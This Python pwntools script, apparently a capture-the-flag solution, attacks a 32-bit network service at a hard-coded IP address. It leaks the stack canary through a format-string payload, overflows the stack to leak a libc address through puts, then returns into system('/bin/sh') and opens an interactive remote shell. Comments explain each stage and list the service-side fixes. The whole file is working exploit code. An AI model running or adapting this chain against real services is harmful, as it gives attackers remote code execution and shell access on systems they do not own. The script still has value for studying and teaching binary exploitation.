from pwn import *
from LibcSearcher import*
# CTF-style script against a 32-bit service. It runs three stages: leak the stack
# canary, leak a libc address, then return into libc.
# Reviewer summary of what the script depends on, and the fix that removes each:
#   * user input interpreted as a printf-style format -> use a constant format
#     string on the service side, e.g. printf("%s", buf)
#   * an unbounded write past a stack buffer -> bound the read to the buffer size
#   * fixed PLT/GOT/code addresses -> build the binary as PIE (with full RELRO)
# These are inferred from the payloads below; the service source is not shown.
# Connect to the remote service and load the local copy of the binary, which is
# used only to look up PLT/GOT addresses.
sh=remote('182.92.237.102',10012)
elf=ELF('./pwn')
# 32-bit x86 target.
context.arch='i386'
# Stage 1 - canary leak. The input is a format directive (%19$p: print positional
# argument 19 as a pointer). Presumably the service passes the input to printf as
# the format string, and slot 19 holds the stack canary - TODO confirm on the binary.
payload=b'a%19$p'
sh.sendline(payload)
sh.recvuntil(b'0x')
# Parse the next 8 hex digits (one 32-bit value) as the leaked canary.
canary=int(sh.recv(4*2),16)
success('canary '+hex(canary))
# Stage 2 - libc address leak. Addresses come straight from the ELF file and a
# hard-coded constant, so this only works if the binary loads at a fixed base
# (presumably built without PIE - verify).
leak='read'
leak_got=elf.got[leak]
puts_plt=elf.plt['puts']
# Address execution returns to after the call. Presumably the input routine, since
# the script waits for the b'Input' prompt again afterwards - confirm.
call_back=0x80494E0
# Layout: 136 filler bytes, the leaked canary written back unchanged (presumably
# so the stack-protector check still passes), a 4-byte placeholder (0xdead), and
# 8 more filler bytes. The offsets are specific to this binary's stack frame.
payload=b'a'*(136)+p32(canary)+p32(0xdead)+b'a'*(8)
# Overwritten return address = puts@plt, its return address = call_back, and its
# argument = the GOT entry of read. The service prints read's resolved address.
payload+=p32(puts_plt)+p32(call_back)+p32(leak_got)
sh.recvuntil(b'Input')
sh.sendline(payload)
# Take the 4 bytes ending at the first 0xf7 byte as a 32-bit address. This assumes
# libc is mapped at 0xf7xxxxxx, which is a heuristic, not a guarantee.
leak_add=u32(sh.recvuntil(b'\xf7')[-4:])
# Identify the libc build from the symbol name and leaked address, then derive the
# base plus the addresses of system and the "/bin/sh" string from its offsets.
libc=LibcSearcher(leak,leak_add)
libcbase=leak_add-libc.dump(leak)
system=libcbase+libc.dump('system')
str_bin_sh=libcbase+libc.dump('str_bin_sh')
log.info('libcbase '+hex(libcbase))
# Stage 3 - same overflow layout as stage 2, now returning into system(str_bin_sh).
payload=b'a'*(136)+p32(canary)+p32(0xdead)+b'a'*(8)
payload+=p32(system)+p32(call_back)+p32(str_bin_sh)
sh.recvuntil(b'Input')
sh.sendline(payload)
# Hand the connection over to the local terminal.
sh.interactive()